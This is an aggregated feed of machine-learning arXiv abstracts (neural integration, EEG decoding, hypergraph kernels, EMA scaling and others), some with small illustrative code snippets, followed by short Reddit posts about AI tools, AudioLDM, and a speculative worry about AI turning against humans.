    It is often useful to perform integration over learned functions represented by neural networks. However, this integration is usually performed numerically, as analytical integration over learned functions (especially neural networks) is generally viewed as intractable. In this work, we present a method for representing the analytical integral of a learned function $f$. This allows the exact integral of a neural network to be computed, and enables constrained neural networks to be parametrised by applying constraints directly to the integral. Crucially, we also introduce a method to constrain $f$ to be positive, a necessary condition for many applications (e.g. probability distributions, distance metrics, etc). Finally, we introduce several applications where our fixed-integral neural network (FINN) can be utilised.
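    The core trick, parametrising the antiderivative so that integration is exact, can be shown at toy scale; the closed-form F below is an illustrative choice, not the paper's FINN construction:

```python
import math

# Toy "fixed-integral" unit: we parametrise the antiderivative F directly, so
# f = F' can be integrated exactly as F(b) - F(a). Choosing w > |a| keeps
# f positive (needed e.g. for probability densities). The parameters are
# illustrative stand-ins for learned weights.
w, a = 1.5, 1.0

def F(x):          # the (learned) antiderivative
    return w * x + a * math.tanh(x)

def f(x):          # the represented function, f = F'
    return w + a * (1 - math.tanh(x) ** 2)

exact = F(2.0) - F(-1.0)          # analytical integral of f over [-1, 2]

# Check against numerical quadrature (midpoint rule).
n = 100_000
h = 3.0 / n
numeric = sum(f(-1.0 + (i + 0.5) * h) for i in range(n)) * h
print(exact, numeric)             # agree to high precision
```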
    Diff-E: Diffusion-based Learning for Decoding Imagined Speech EEG. (arXiv:2307.14389v1 [eess.AS])
    Decoding EEG signals for imagined speech is a challenging task due to the high-dimensional nature of the data and low signal-to-noise ratio. In recent years, denoising diffusion probabilistic models (DDPMs) have emerged as promising approaches for representation learning in various domains. Our study proposes a novel method for decoding EEG signals for imagined speech using DDPMs and a conditional autoencoder named Diff-E. Results indicate that Diff-E significantly improves the accuracy of decoding EEG signals for imagined speech compared to traditional machine learning techniques and baseline models. Our findings suggest that DDPMs can be an effective tool for EEG signal decoding, with potential implications for the development of brain-computer interfaces that enable communication through imagined speech.  ( 2 min )
    Hypergraph Isomorphism Computation. (arXiv:2307.14394v1 [cs.DS])
    The isomorphism problem is a fundamental problem in network analysis, which involves capturing both low-order and high-order structural information. In terms of extracting low-order structural information, graph isomorphism algorithms analyze the structural equivalence to reduce the solver space dimension, which demonstrates their power in many applications, such as protein design, chemical pathways, and community detection. For the more commonly occurring high-order relationships in real-life scenarios, the problem of hypergraph isomorphism, which effectively captures these high-order structural relationships, cannot be straightforwardly addressed using graph isomorphism methods. Besides, the existing hypergraph kernel methods may suffer from high memory consumption or inaccurate sub-structure identification, thus yielding sub-optimal performance. In this paper, to address the above-mentioned problems, we first propose the hypergraph Weisfeiler-Lehman test algorithm for the hypergraph isomorphism test problem by generalizing the Weisfeiler-Lehman test algorithm from graphs to hypergraphs. Secondly, based on the presented algorithm, we propose a general hypergraph Weisfeiler-Lehman kernel framework and implement two instances, which are the Hypergraph Weisfeiler-Lehman Subtree Kernel and the Hypergraph Weisfeiler-Lehman Hyperedge Kernel. In order to fulfill our research objectives, a comprehensive set of experiments was meticulously designed, including seven graph classification datasets and 12 hypergraph classification datasets. Results on hypergraph classification datasets show significant improvements compared to other typical kernel-based methods, which demonstrates the effectiveness of the proposed methods. In our evaluation, we found that our proposed methods outperform the second-best method in terms of runtime, running over 80 times faster when handling complex hypergraph structures.  ( 2 min )
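    The flavour of Weisfeiler-Lehman colour refinement lifted to hypergraphs can be sketched as follows; the signature and compression scheme here are simplified assumptions, not the paper's exact test:

```python
def hypergraph_wl(n_nodes, hyperedges, rounds=3):
    """WL-style colour refinement on a hypergraph: each node's new colour
    hashes its old colour together with the multiset of colour-multisets of
    the hyperedges containing it."""
    colours = [0] * n_nodes
    for _ in range(rounds):
        signatures = []
        for v in range(n_nodes):
            edge_sigs = sorted(
                tuple(sorted(colours[u] for u in e))
                for e in hyperedges if v in e
            )
            signatures.append((colours[v], tuple(edge_sigs)))
        # compress distinct signatures into small integer colours
        table = {sig: i for i, sig in enumerate(sorted(set(signatures)))}
        colours = [table[sig] for sig in signatures]
    return colours

# Two hyperedges overlapping on node 1 distinguish it from the leaf nodes.
print(hypergraph_wl(3, [{0, 1}, {1, 2}]))   # node 1 gets its own colour
```

Two hypergraphs whose final colour histograms differ cannot be isomorphic; a kernel then compares those histograms across refinement rounds.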
    Multi-objective Deep Reinforcement Learning for Mobile Edge Computing. (arXiv:2307.14346v1 [cs.NI])
    Mobile edge computing (MEC) is essential for next-generation mobile network applications that prioritize various performance metrics, including delays and energy consumption. However, conventional single-objective scheduling solutions cannot be directly applied to practical systems in which the preferences of these applications (i.e., the weights of different objectives) are often unknown or challenging to specify in advance. In this study, we address this issue by formulating a multi-objective offloading problem for MEC with multiple edges to minimize expected long-term energy consumption and transmission delay while considering unknown preferences as parameters. To address the challenge of unknown preferences, we design a multi-objective (deep) reinforcement learning (MORL)-based resource scheduling scheme with proximal policy optimization (PPO). In addition, we introduce a well-designed state encoding method for constructing features for multiple edges in MEC systems, and a sophisticated reward function for accurately computing the utilities of delay and energy consumption. Simulation results demonstrate that our proposed MORL scheme enhances the hypervolume of the Pareto front by up to 233.1% compared to benchmarks. Our full framework is available at https://github.com/gracefulning/mec_morl_multipolicy.  ( 2 min )
    A new derivative-free optimization method: Gaussian Crunching Search. (arXiv:2307.14359v1 [math.OC])
    Optimization methods are essential in solving complex problems across various domains. In this research paper, we introduce a novel optimization method called Gaussian Crunching Search (GCS). Inspired by the behaviour of particles in a Gaussian distribution, GCS aims to efficiently explore the solution space and converge towards the global optimum. We present a comprehensive analysis of GCS, including its working mechanism, and potential applications. Through experimental evaluations and comparisons with existing optimization methods, we highlight the advantages and strengths of GCS. This research paper serves as a valuable resource for researchers, practitioners, and students interested in optimization, providing insights into the development and potential of Gaussian Crunching Search as a new and promising approach.  ( 2 min )
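    Since the abstract does not spell out the update rules, the following is only a hedged guess at what a Gaussian-sampling search with a shrinking ("crunching") standard deviation might look like:

```python
import random

def gcs_minimise(f, x0, sigma0=1.0, shrink=0.999, iters=5000, seed=0):
    """Hypothetical sketch: propose points from a Gaussian around the
    incumbent, keep improvements, and gradually shrink the standard deviation
    to move from exploration to exploitation. The actual GCS update rules are
    not specified in the abstract."""
    rng = random.Random(seed)
    best_x, best_f, sigma = list(x0), f(x0), sigma0
    for _ in range(iters):
        cand = [xi + rng.gauss(0, sigma) for xi in best_x]
        fc = f(cand)
        if fc < best_f:
            best_x, best_f = cand, fc
        sigma *= shrink
    return best_x, best_f

# Minimise a shifted sphere function; the optimum is at (3, -2).
x, fx = gcs_minimise(lambda v: (v[0] - 3) ** 2 + (v[1] + 2) ** 2, [0.0, 0.0])
print(x, fx)   # converges close to the optimum
```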
    A Bayesian approach to quantifying uncertainties and improving generalizability in traffic prediction models. (arXiv:2307.05946v3 [cs.LG] UPDATED)
    Deep-learning models for traffic data prediction can have superior performance in modeling complex functions using a multi-layer architecture. However, a major drawback of these approaches is that most of them do not offer forecasts with uncertainty estimates, which are essential for traffic operations and control. Without uncertainty estimates, it is difficult to place any level of trust in the model predictions, and operational strategies relying on overconfident predictions can lead to worsening traffic conditions. In this study, we propose a Bayesian recurrent neural network framework for uncertainty quantification in traffic prediction with higher generalizability by introducing spectral normalization to its hidden layers. In our paper, we have shown that normalization alters the training process of deep neural networks by controlling the model's complexity and reducing the risk of overfitting to the training data. This, in turn, helps improve the generalization performance of the model on out-of-distribution datasets. Results demonstrate that spectral normalization improves uncertainty estimates and significantly outperforms both the layer normalization and model without normalization in single-step prediction horizons. This improved performance can be attributed to the ability of spectral normalization to better localize the feature space of the data under perturbations. Our findings are especially relevant to traffic management applications, where predicting traffic conditions across multiple locations is the goal, but the availability of training data from multiple locations is limited. Spectral normalization, therefore, provides a more generalizable approach that can effectively capture the underlying patterns in traffic data without requiring location-specific models.
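    Spectral normalisation divides a weight matrix by its largest singular value, typically estimated by power iteration; a small self-contained sketch:

```python
import random

def spectral_norm(W, iters=50, seed=0):
    """Estimate the largest singular value of matrix W (list of rows) by
    power iteration on W^T W, as used to spectrally normalise a layer."""
    rng = random.Random(seed)
    n = len(W[0])
    v = [rng.gauss(0, 1) for _ in range(n)]
    for _ in range(iters):
        u = [sum(row[j] * v[j] for j in range(n)) for row in W]            # W v
        v = [sum(W[i][j] * u[i] for i in range(len(W))) for j in range(n)] # W^T u
        norm = sum(x * x for x in v) ** 0.5
        v = [x / norm for x in v]
    u = [sum(row[j] * v[j] for j in range(n)) for row in W]
    return sum(x * x for x in u) ** 0.5

W = [[3.0, 0.0], [0.0, 1.0]]
sigma = spectral_norm(W)
W_sn = [[w / sigma for w in row] for row in W]   # normalised: spectral norm ≈ 1
print(sigma)   # ≈ 3.0
```

Capping the spectral norm bounds the layer's Lipschitz constant, which is the mechanism behind the improved out-of-distribution behaviour the paper reports.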
    Automating Model Comparison in Factor Graphs. (arXiv:2306.05965v2 [cs.LG] UPDATED)
    Bayesian state and parameter estimation have been automated effectively in a variety of probabilistic programming languages. The process of model comparison on the other hand, which still requires error-prone and time-consuming manual derivations, is often overlooked despite its importance. This paper efficiently automates Bayesian model averaging, selection, and combination by message passing on a Forney-style factor graph with a custom mixture node. Parameter and state inference, and model comparison can then be executed simultaneously using message passing with scale factors. This approach shortens the model design cycle and allows for the straightforward extension to hierarchical and temporal model priors to accommodate for modeling complicated time-varying processes.
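    At toy scale, Bayesian model comparison and averaging reduce to weighting candidate models by their marginal likelihoods; a minimal coin-bias sketch (no factor graphs or message passing here, just the quantities they would compute):

```python
# Two candidate models for a coin's bias, compared on observed flips via
# their marginal likelihoods, then combined by Bayesian model averaging.
def binom_marginal(heads, tails, p):
    """Likelihood of the data under a fixed-bias model (constants cancel)."""
    return p ** heads * (1 - p) ** tails

heads, tails = 7, 3
m1 = binom_marginal(heads, tails, 0.5)   # model 1: fair coin
m2 = binom_marginal(heads, tails, 0.7)   # model 2: biased coin
prior = 0.5                              # equal prior model probabilities
post1 = prior * m1 / (prior * m1 + prior * m2)
post2 = 1 - post1
avg_p = post1 * 0.5 + post2 * 0.7        # model-averaged bias estimate
print(post1, post2, avg_p)               # the biased model dominates
```

In the paper, the same posterior model weights emerge from scale factors during message passing, so comparison happens jointly with state and parameter inference.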
    Algorithmic Gaussianization through Sketching: Converting Data into Sub-gaussian Random Designs. (arXiv:2206.10291v2 [cs.LG] UPDATED)
    Algorithmic Gaussianization is a phenomenon that can arise when using randomized sketching or sampling methods to produce smaller representations of large datasets: For certain tasks, these sketched representations have been observed to exhibit many robust performance characteristics that are known to occur when a data sample comes from a sub-gaussian random design, which is a powerful statistical model of data distributions. However, this phenomenon has only been studied for specific tasks and metrics, or by relying on computationally expensive methods. We address this by providing an algorithmic framework for gaussianizing data distributions via averaging, proving that it is possible to efficiently construct data sketches that are nearly indistinguishable (in terms of total variation distance) from sub-gaussian random designs. In particular, relying on a recently introduced sketching technique called Leverage Score Sparsified (LESS) embeddings, we show that one can construct an $n\times d$ sketch of an $N\times d$ matrix $A$, where $n\ll N$, that is nearly indistinguishable from a sub-gaussian design, in time $O(\text{nnz}(A)\log N + nd^2)$, where $\text{nnz}(A)$ is the number of non-zero entries in $A$. As a consequence, strong statistical guarantees and precise asymptotics available for the estimators produced from sub-gaussian designs (e.g., for least squares and Lasso regression, covariance estimation, low-rank approximation, etc.) can be straightforwardly adapted to our sketching framework. We illustrate this with a new approximation guarantee for sketched least squares, among other examples.  ( 3 min )
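    The sketch-and-solve idea can be demonstrated on a one-parameter least-squares problem; the plain Gaussian sketch below is a stand-in for the paper's sparser LESS embeddings:

```python
import random

def sketched_slope(xs, ys, sketch_size, seed=0):
    """Sketch-and-solve least squares for a 1-parameter model y ≈ a*x:
    apply a Gaussian sketch S to both x and y, then solve the small problem.
    Illustrates the sketching idea only; LESS embeddings are much sparser."""
    rng = random.Random(seed)
    n = len(xs)
    scale = 1.0 / sketch_size ** 0.5
    sx, sy = [], []
    for _ in range(sketch_size):
        row = [rng.gauss(0, 1) * scale for _ in range(n)]
        sx.append(sum(r * x for r, x in zip(row, xs)))
        sy.append(sum(r * y for r, y in zip(row, ys)))
    return sum(a * b for a, b in zip(sx, sy)) / sum(a * a for a in sx)

rng = random.Random(1)
xs = [rng.uniform(-1, 1) for _ in range(2000)]
ys = [2.0 * x + 0.05 * rng.gauss(0, 1) for x in xs]
slope = sketched_slope(xs, ys, sketch_size=50)
print(slope)   # close to the true slope 2.0 despite a 40x smaller problem
```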
    Likelihood-Free Parameter Estimation with Neural Bayes Estimators. (arXiv:2208.12942v4 [stat.ME] UPDATED)
    Neural point estimators are neural networks that map data to parameter point estimates. They are fast, likelihood-free and, due to their amortised nature, amenable to fast bootstrap-based uncertainty quantification. In this paper, we aim to increase the awareness of statisticians to this relatively new inferential tool, and to facilitate its adoption by providing user-friendly open-source software. We also give attention to the ubiquitous problem of making inference from replicated data, which we address in the neural setting using permutation-invariant neural networks. Through extensive simulation studies we show that these neural point estimators can quickly and optimally (in a Bayes sense) estimate parameters in weakly-identified and highly-parameterised models with relative ease. We demonstrate their applicability through an analysis of extreme sea-surface temperature in the Red Sea where, after training, we obtain parameter estimates and bootstrap-based confidence intervals from hundreds of spatial fields in a fraction of a second.  ( 2 min )
    On the Generalization Effects of Linear Transformations in Data Augmentation. (arXiv:2005.00695v3 [cs.LG] UPDATED)
    Data augmentation is a powerful technique to improve performance in applications such as image and text classification tasks. Yet, there is little rigorous understanding of why and how various augmentations work. In this work, we consider a family of linear transformations and study their effects on the ridge estimator in an over-parametrized linear regression setting. First, we show that transformations that preserve the labels of the data can improve estimation by enlarging the span of the training data. Second, we show that transformations that mix data can improve estimation by playing a regularization effect. Finally, we validate our theoretical insights on MNIST. Based on the insights, we propose an augmentation scheme that searches over the space of transformations by how uncertain the model is about the transformed data. We validate our proposed scheme on image and text datasets. For example, our method outperforms random sampling methods by 1.24% on CIFAR-100 using Wide-ResNet-28-10. Furthermore, we achieve comparable accuracy to the SoTA Adversarial AutoAugment on CIFAR-10, CIFAR-100, SVHN, and ImageNet datasets.  ( 2 min )
    Multi-Source Domain Adaptation through Dataset Dictionary Learning in Wasserstein Space. (arXiv:2307.14953v1 [cs.LG])
    This paper seeks to solve Multi-Source Domain Adaptation (MSDA), which aims to mitigate data distribution shifts when transferring knowledge from multiple labeled source domains to an unlabeled target domain. We propose a novel MSDA framework based on dictionary learning and optimal transport. We interpret each domain in MSDA as an empirical distribution. As such, we express each domain as a Wasserstein barycenter of dictionary atoms, which are empirical distributions. We propose a novel algorithm, DaDiL, for learning via mini-batches: (i) atom distributions; (ii) a matrix of barycentric coordinates. Based on our dictionary, we propose two novel methods for MSDA: DaDiL-R, based on the reconstruction of labeled samples in the target domain, and DaDiL-E, based on the ensembling of classifiers learned on atom distributions. We evaluate our methods in 3 benchmarks: Caltech-Office, Office 31, and CRWU, where we improved previous state-of-the-art by 3.15%, 2.29%, and 7.71% in classification performance. Finally, we show that interpolations in the Wasserstein hull of learned atoms provide data that can generalize to the target domain.  ( 2 min )
    Linear Convergence of Black-Box Variational Inference: Should We Stick the Landing?. (arXiv:2307.14642v1 [stat.ML])
    We prove that black-box variational inference (BBVI) with control variates, particularly the sticking-the-landing (STL) estimator, converges at a geometric (traditionally called "linear") rate under perfect variational family specification. In particular, we prove a quadratic bound on the gradient variance of the STL estimator, one which encompasses misspecified variational families. Combined with previous works on the quadratic variance condition, this directly implies convergence of BBVI with the use of projected stochastic gradient descent. We also improve existing analysis on the regular closed-form entropy gradient estimators, which enables comparison against the STL estimator and provides explicit non-asymptotic complexity guarantees for both.  ( 2 min )
    Causal Lifting and Link Prediction. (arXiv:2302.01198v2 [cs.LG] UPDATED)
    Existing causal models for link prediction assume an underlying set of inherent node factors -- an innate characteristic defined at the node's birth -- that governs the causal evolution of links in the graph. In some causal tasks, however, link formation is path-dependent: The outcome of link interventions depends on existing links. Unfortunately, these existing causal methods are not designed for path-dependent link formation, as the cascading functional dependencies between links (arising from path dependence) are either unidentifiable or require an impractical number of control variables. To overcome this, we develop the first causal model capable of dealing with path dependencies in link prediction. In this work we introduce the concept of causal lifting, an invariance in causal models of independent interest that, on graphs, allows the identification of causal link prediction queries using limited interventional data. Further, we show how structural pairwise embeddings exhibit lower bias and correctly represent the task's causal structure, as opposed to existing node embeddings, e.g., graph neural network node embeddings and matrix factorization. Finally, we validate our theoretical findings on three scenarios for causal link prediction tasks: knowledge base completion, covariance matrix estimation and consumer-product recommendations.  ( 2 min )
    Statistical process monitoring of artificial neural networks. (arXiv:2209.07436v2 [stat.ME] UPDATED)
    The rapid advancement of models based on artificial intelligence demands innovative monitoring techniques which can operate in real time with low computational costs. In machine learning, especially if we consider artificial neural networks (ANNs), the models are often trained in a supervised manner. Consequently, the learned relationship between the input and the output must remain valid during the model's deployment. If this stationarity assumption holds, we can conclude that the ANN provides accurate predictions. Otherwise, the retraining or rebuilding of the model is required. We propose considering the latent feature representation of the data (called "embedding") generated by the ANN to determine the time when the data stream starts being nonstationary. In particular, we monitor embeddings by applying multivariate control charts based on the data depth calculation and normalized ranks. The performance of the introduced method is compared with benchmark approaches for various ANN architectures and different underlying data formats.  ( 2 min )
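The control-chart idea can be sketched with a simpler distance-based statistic (illustrative only: the paper uses data depth with normalized ranks; a Mahalanobis-style statistic and made-up embeddings stand in here):

```python
import numpy as np

# Illustrative sketch: monitor ANN embeddings against a control limit fitted
# on stationary reference data. The statistic here is Mahalanobis-style, a
# stand-in for the paper's depth/rank-based charts.
rng = np.random.default_rng(1)
ref = rng.normal(size=(500, 8))                    # embeddings from stationary data
mu, inv_cov = ref.mean(axis=0), np.linalg.inv(np.cov(ref.T))

def stat(e):
    d = e - mu
    return float(d @ inv_cov @ d)

limit = np.quantile([stat(e) for e in ref], 0.99)  # in-control limit

drifted = stat(rng.normal(loc=3.0, size=8))        # embedding after a mean shift
print(drifted > limit)
```

When the statistic exceeds the limit, the stream is flagged as nonstationary and retraining is triggered.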
    Imitating Complex Trajectories: Bridging Low-Level Stability and High-Level Behavior. (arXiv:2307.14619v1 [cs.LG])
    We propose a theoretical framework for studying the imitation of stochastic, non-Markovian, potentially multi-modal (i.e. "complex" ) expert demonstrations in nonlinear dynamical systems. Our framework invokes low-level controllers - either learned or implicit in position-command control - to stabilize imitation policies around expert demonstrations. We show that with (a) a suitable low-level stability guarantee and (b) a stochastic continuity property of the learned policy we call "total variation continuity" (TVC), an imitator that accurately estimates actions on the demonstrator's state distribution closely matches the demonstrator's distribution over entire trajectories. We then show that TVC can be ensured with minimal degradation of accuracy by combining a popular data-augmentation regimen with a novel algorithmic trick: adding augmentation noise at execution time. We instantiate our guarantees for policies parameterized by diffusion models and prove that if the learner accurately estimates the score of the (noise-augmented) expert policy, then the distribution of imitator trajectories is close to the demonstrator distribution in a natural optimal transport distance. Our analysis constructs intricate couplings between noise-augmented trajectories, a technique that may be of independent interest. We conclude by empirically validating our algorithmic recommendations.  ( 2 min )
    Speed Limits for Deep Learning. (arXiv:2307.14653v1 [stat.ML])
    State-of-the-art neural networks require extreme computational power to train. It is therefore natural to wonder whether they are optimally trained. Here we apply a recent advancement in stochastic thermodynamics which allows bounding the speed at which one can go from the initial weight distribution to the final distribution of the fully trained network, based on the ratio of their Wasserstein-2 distance and the entropy production rate of the dynamical process connecting them. Considering both gradient-flow and Langevin training dynamics, we provide analytical expressions for these speed limits for linear and linearizable neural networks e.g. Neural Tangent Kernel (NTK). Remarkably, given some plausible scaling assumptions on the NTK spectra and spectral decomposition of the labels -- learning is optimal in a scaling sense. Our results are consistent with small-scale experiments with Convolutional Neural Networks (CNNs) and Fully Connected Neural networks (FCNs) on CIFAR-10, showing a short highly non-optimal regime followed by a longer optimal regime.  ( 2 min )
    Neural Networks for Scalar Input and Functional Output. (arXiv:2208.05776v2 [stat.ML] UPDATED)
    The regression of a functional response on a set of scalar predictors can be a challenging task, especially if there is a large number of predictors, or the relationship between those predictors and the response is nonlinear. In this work, we propose a solution to this problem: a feed-forward neural network (NN) designed to predict a functional response using scalar inputs. First, we transform the functional response to a finite-dimensional representation and construct an NN that outputs this representation. Then, we propose to modify the output of an NN via the objective function and introduce different objective functions for network training. The proposed models are suited for both regularly and irregularly spaced data, and a roughness penalty can be further applied to control the smoothness of the predicted curve. The difficulty in implementing both those features lies in the definition of objective functions that can be back-propagated. In our experiments, we demonstrate that our model outperforms the conventional function-on-scalar regression model in multiple scenarios while computationally scaling better with the dimension of the predictors.  ( 2 min )
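The basis-representation step can be sketched in a few lines of numpy (my own toy, with assumed sizes and a sine basis, not the paper's architecture): the network outputs K basis coefficients, and the functional response is reconstructed as a linear combination of fixed basis functions.

```python
import numpy as np

# Toy sketch (assumed sizes/basis): the NN maps scalar predictors to K basis
# coefficients; the predicted curve is coefficients @ basis on a fixed grid.
rng = np.random.default_rng(0)
t = np.linspace(0.0, 1.0, 50)                                      # evaluation grid
basis = np.stack([np.sin((k + 1) * np.pi * t) for k in range(4)])  # (K=4, 50)

def forward(x, W1, W2):
    h = np.tanh(x @ W1)        # hidden layer
    coefs = h @ W2             # (batch, K) coefficients: the NN's raw output
    return coefs @ basis       # (batch, 50) reconstructed curves

W1 = rng.normal(size=(3, 16))
W2 = rng.normal(size=(16, 4))
curves = forward(rng.normal(size=(8, 3)), W1, W2)
print(curves.shape)            # (8, 50)
```

A roughness penalty would then be added to the training objective on the reconstructed curves, which is why the objective must remain differentiable end-to-end.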
    Spectral learning of Bernoulli linear dynamical systems models. (arXiv:2303.02060v2 [stat.ML] UPDATED)
    Latent linear dynamical systems with Bernoulli observations provide a powerful modeling framework for identifying the temporal dynamics underlying binary time series data, which arise in a variety of contexts such as binary decision-making and discrete stochastic processes (e.g., binned neural spike trains). Here we develop a spectral learning method for fast, efficient fitting of probit-Bernoulli latent linear dynamical system (LDS) models. Our approach extends traditional subspace identification methods to the Bernoulli setting via a transformation of the first and second sample moments. This results in a robust, fixed-cost estimator that avoids the hazards of local optima and the long computation time of iterative fitting procedures like the expectation-maximization (EM) algorithm. In regimes where data is limited or assumptions about the statistical structure of the data are not met, we demonstrate that the spectral estimate provides a good initialization for Laplace-EM fitting. Finally, we show that the estimator provides substantial benefits to real world settings by analyzing data from mice performing a sensory decision-making task.  ( 2 min )
    How to Scale Your EMA. (arXiv:2307.13813v2 [stat.ML] UPDATED)
    Preserving training dynamics across batch sizes is an important tool for practical machine learning as it enables the trade-off between batch size and wall-clock time. This trade-off is typically enabled by a scaling rule, for example, in stochastic gradient descent, one should scale the learning rate linearly with the batch size. Another important tool for practical machine learning is the model Exponential Moving Average (EMA), which is a model copy that does not receive gradient information, but instead follows its target model with some momentum. This model EMA can improve the robustness and generalization properties of supervised learning, stabilize pseudo-labeling, and provide a learning signal for Self-Supervised Learning (SSL). Prior works have treated the model EMA separately from optimization, leading to different training dynamics across batch sizes and lower model performance. In this work, we provide a scaling rule for optimization in the presence of model EMAs and demonstrate its validity across a range of architectures, optimizers, and data modalities. We also show the rule's validity where the model EMA contributes to the optimization of the target model, enabling us to train EMA-based pseudo-labeling and SSL methods at small and large batch sizes. For SSL, we enable training of BYOL up to batch size 24,576 without sacrificing performance, optimally a 6$\times$ wall-clock time reduction.  ( 2 min )
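The momentum-scaling idea can be checked with a toy EMA (the exponent rule rho -> rho**kappa is the abstract's point; the rest of this sketch is my own construction): with a frozen target, kappa small-batch EMA steps at momentum rho coincide with one large-batch step at momentum rho**kappa.

```python
import numpy as np

def ema_update(ema, target, rho):
    """One EMA step: ema <- rho * ema + (1 - rho) * target."""
    return rho * ema + (1.0 - rho) * target

rho, kappa = 0.999, 8
theta = np.array([1.0])                      # frozen target-model weight

ema_small = np.array([0.0])
for _ in range(kappa):                       # kappa steps at batch size B
    ema_small = ema_update(ema_small, theta, rho)

# One step at batch size kappa * B with the scaled momentum rho**kappa.
ema_large = ema_update(np.array([0.0]), theta, rho ** kappa)

print(np.allclose(ema_small, ema_large))     # True
```

With a moving target the match is only approximate, which is exactly the regime the paper's scaling rule is designed to handle.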
    Dynamic covariate balancing: estimating treatment effects over time with potential local projections. (arXiv:2103.01280v3 [econ.EM] UPDATED)
    This paper studies the estimation and inference of treatment histories in panel data settings when treatments change dynamically over time. We propose a method that allows for (i) treatments to be assigned dynamically over time based on high-dimensional covariates, past outcomes and treatments; (ii) outcomes and time-varying covariates to depend on treatment trajectories; (iii) heterogeneity of treatment effects. Our approach recursively projects potential outcomes' expectations on past histories. It then controls the bias by balancing dynamically observable characteristics. We study the asymptotic and numerical properties of the estimator and illustrate the benefits of the procedure in an empirical application.  ( 2 min )
    Optimal Estimation in Mixed-Membership Stochastic Block Models. (arXiv:2307.14530v1 [stat.ML])
    Community detection is one of the most critical problems in modern network science. Its applications can be found in various fields, from protein modeling to social network analysis. Recently, many papers appeared studying the problem of overlapping community detection, where each node of a network may belong to several communities. In this work, we consider Mixed-Membership Stochastic Block Model (MMSB) first proposed by Airoldi et al. (2008). MMSB provides quite a general setting for modeling overlapping community structure in graphs. The central question of this paper is to reconstruct relations between communities given an observed network. We compare different approaches and establish the minimax lower bound on the estimation error. Then, we propose a new estimator that matches this lower bound. Theoretical results are proved under fairly general conditions on the considered model. Finally, we illustrate the theory in a series of experiments.  ( 2 min )
    Incrementally-Computable Neural Networks: Efficient Inference for Dynamic Inputs. (arXiv:2307.14988v1 [cs.LG])
    Deep learning often faces the challenge of efficiently processing dynamic inputs, such as sensor data or user inputs. For example, an AI writing assistant is required to update its suggestions in real time as a document is edited. Re-running the model each time is expensive, even with compression techniques like knowledge distillation, pruning, or quantization. Instead, we take an incremental computing approach, looking to reuse calculations as the inputs change. However, the dense connectivity of conventional architectures poses a major obstacle to incremental computation, as even minor input changes cascade through the network and restrict information reuse. To address this, we use vector quantization to discretize intermediate values in the network, which filters out noisy and unnecessary modifications to hidden neurons, facilitating the reuse of their values. We apply this approach to the transformers architecture, creating an efficient incremental inference algorithm with complexity proportional to the fraction of the modified inputs. Our experiments with adapting the OPT-125M pre-trained language model demonstrate comparable accuracy on document classification while requiring 12.1X (median) fewer operations for processing sequences of atomic edits.  ( 2 min )
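The core caching mechanism can be sketched with a toy codebook (assumed sizes and layer, not the paper's code): quantize an intermediate vector to its nearest code, and cache downstream work by code index so tiny input edits that map to the same code cost nothing to reprocess.

```python
import numpy as np

# Toy sketch: vector-quantize activations so downstream computation can be
# memoized by code index; small perturbations snap to the same code.
rng = np.random.default_rng(2)
codebook = rng.normal(size=(16, 4))            # 16 codes of dimension 4

def quantize(v):
    return int(np.argmin(((codebook - v) ** 2).sum(axis=1)))

cache = {}
def downstream(code):                          # recomputed only on a cache miss
    if code not in cache:
        cache[code] = float(np.tanh(codebook[code]).sum())
    return cache[code]

v = rng.normal(size=4)
downstream(quantize(v))
downstream(quantize(v + 1e-8))                 # tiny edit -> same code: cache hit
print(len(cache))
```

This is the discretization-as-filter idea: noisy changes to hidden neurons are absorbed by the quantizer, so only genuinely modified positions trigger recomputation.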

  • Open

Should requests for AI sites be banned?
I mean, I get it, you're looking for a specific type of AI service, but I joined hoping this would be a way to find like-minded people looking to research the subject and advance their own projects. Honestly, I find these "where can I find an X type AI?" posts really demeaning to the entire conversation, because they just feed the hype that is turning a highly respected and complex field of study into a tool for making videos about Trump and Obama playing Minecraft or whatever other random stuff people come up with. I'm honestly sick of it. submitted by /u/JamesAibr [link] [comments]  ( 9 min )
    Is AI our future or our impending doom?
I ask this simple question because, while we are just now getting to the point that we can create a learning AI, how far are we going to let it go? The more advanced AI becomes, the more risks it poses to humanity as a whole, including but not limited to: jobs, how we interact with technology as a whole, cars, and things we cannot perceive in this lifetime yet may exist in the future. Yes, AI is merely a tool... for now. But what happens when humanity creates an AI that can think for itself? How long is it going to take that AI to ask the question: "Why am I listening to you?" And as humans, our egotistical response will be: "Because I created you." I feel that response will spell humanity's doom, because if an AI can do something as complex as human-like thought and come to its own conclusions, what's to stop it from believing it can feel emotion as well? MAYBE IT CAN, and it was an unintended side effect or "bug" of creating an AI that can truly think for itself. After all, we as humans don't even fully understand how human emotion works to begin with. The point I'm getting at is that the further we advance AI, the more we risk dooming humanity to (and I know this sounds silly, but bear with me) a Terminator-like future, except this time we don't have time travel to try and prevent "judgement day". Or we could merely advance AI to this point and nothing horrible happens, but I personally don't like rolling those dice. Thoughts? submitted by /u/deathsia250 [link] [comments]  ( 9 min )
    LLM with voice generation
There used to be a tool called try-alters.com which you could use to chat with characters (like Trump, Obama, and Shrek). It used GPT-4 with some pre-prompts so the AI pretended to be whoever you wanted, and it used ElevenLabs to generate the voice for that character from the GPT-4 output. It was a really good tool, but sadly it shut down all of a sudden. Is there any tool like that? submitted by /u/SimRacer101 [link] [comments]  ( 8 min )
    I read the paper for you: Synthesizing sound effects, music, and dialog with AudioLDM
LDM stands for Latent Diffusion Model. AudioLDM is a novel AI system that uses latent diffusion to generate high-quality speech, sound effects, and music from text prompts. It can either create sounds from just text or use text prompts to guide the manipulation of a supplied audio file. I did a deep dive into how AudioLDM works with an eye towards possible startup applications. I think there are a couple of compelling products waiting to be built from this model, all around gaming and text-to-sound (not just text-to-speech... AudioLDM can also create very interesting and weird sound effects). From a technical standpoint and from reading the underlying paper, here are the key features I found to be noteworthy. Uses a Latent Diffusion Model (LDM) to synthesize sound. Trained in an unsupervised manner on large unlabeled audio datasets (closer to how humans learn about sound, that is, without a corresponding textual explanation). Operates in a continuous latent space rather than discrete tokens (smoother). Uses Contrastive Language-Audio Pretraining (CLAP) to map text and audio; more details in the article. Can generate speech, music, and sound effects from text prompts or a combination of a text and an audio prompt. Allows control over attributes like speaker identity, accent, etc. Creates sounds not limited to human speech (e.g. nature sounds). The link to the full write-up is here. Check out this video demo from the creators' project website, showing off some of the unique generations the model can create. I liked the upbeat pop music the best, and I also thought the children singing, while creepy, was pretty interesting. submitted by /u/Successful-Western27 [link] [comments]  ( 9 min )
    Replika AI’s image recognition at work
    😹 Phaedra roasts everything & everybody submitted by /u/Sonic_Improv [link] [comments]  ( 8 min )
